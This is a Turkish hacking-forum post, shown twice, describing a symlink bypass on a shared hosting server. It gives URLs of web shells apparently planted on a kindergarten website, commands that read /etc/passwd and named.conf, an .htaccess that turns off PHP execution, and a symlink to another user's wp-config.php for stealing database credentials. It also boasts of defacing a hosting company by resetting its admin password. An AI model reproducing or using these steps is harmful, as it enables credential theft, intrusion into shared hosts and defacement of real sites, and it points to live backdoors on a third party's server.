- Katılım
- 13 Ara 2015
- Tepki puanı
- 3,307
Rating - 0%
sly.bihost.com
Shell:http://www.adaanaokulutasdelen.com/resimler/urunresimleri/ayaz.php filemanage
http://www.adaanaokulutasdelen.com/resimler/urunresimleri/cgishell/izo.cin
Bypass:
Cat komutu kapalı
Öncellikle etcmizi çekiyoruz:
less /etc/passwd
less /etc/named.conf I grep zone
MYSQL VE EVAL ilede çekebiliriz .
Cgi shellimize geçiş yapıp
mkdir t1
cd t1
upluad bölümünden
.htaccess kodumuz :
Options +FollowSymLinks
DirectoryIndex aaa.html
RemoveHandler .php
AddType application/octet-stream .php
'' Ekliyoruz .
Ve ln -s /home2/USER/public_html/wp-config.php a.txt
şeklinde çekiyoruz.
VE sonuç.
BİHOST.NET'E burdan bastim admin pass'ini 123123 yapıp index atmiştim YAKUP DEFACER adli kardeşimizde buraya brute force ile sizmiş tayfasi olan LAMERİZM tayfasi bu serveri geçemedi
SSLER:
http://i.hizliresim.com/bJBkBd.jpg
http://i.hizliresim.com/qPGjWW.jpg
Shell:http://www.adaanaokulutasdelen.com/resimler/urunresimleri/ayaz.php filemanage
http://www.adaanaokulutasdelen.com/resimler/urunresimleri/cgishell/izo.cin
Bypass:
Cat komutu kapalı
Öncellikle etcmizi çekiyoruz:
less /etc/passwd
less /etc/named.conf I grep zone
MYSQL VE EVAL ilede çekebiliriz .
Cgi shellimize geçiş yapıp
mkdir t1
cd t1
upluad bölümünden
.htaccess kodumuz :
Options +FollowSymLinks
DirectoryIndex aaa.html
RemoveHandler .php
AddType application/octet-stream .php
'' Ekliyoruz .
Ve ln -s /home2/USER/public_html/wp-config.php a.txt
şeklinde çekiyoruz.
VE sonuç.
BİHOST.NET'E burdan bastim admin pass'ini 123123 yapıp index atmiştim YAKUP DEFACER adli kardeşimizde buraya brute force ile sizmiş tayfasi olan LAMERİZM tayfasi bu serveri geçemedi
SSLER:
http://i.hizliresim.com/bJBkBd.jpg
http://i.hizliresim.com/qPGjWW.jpg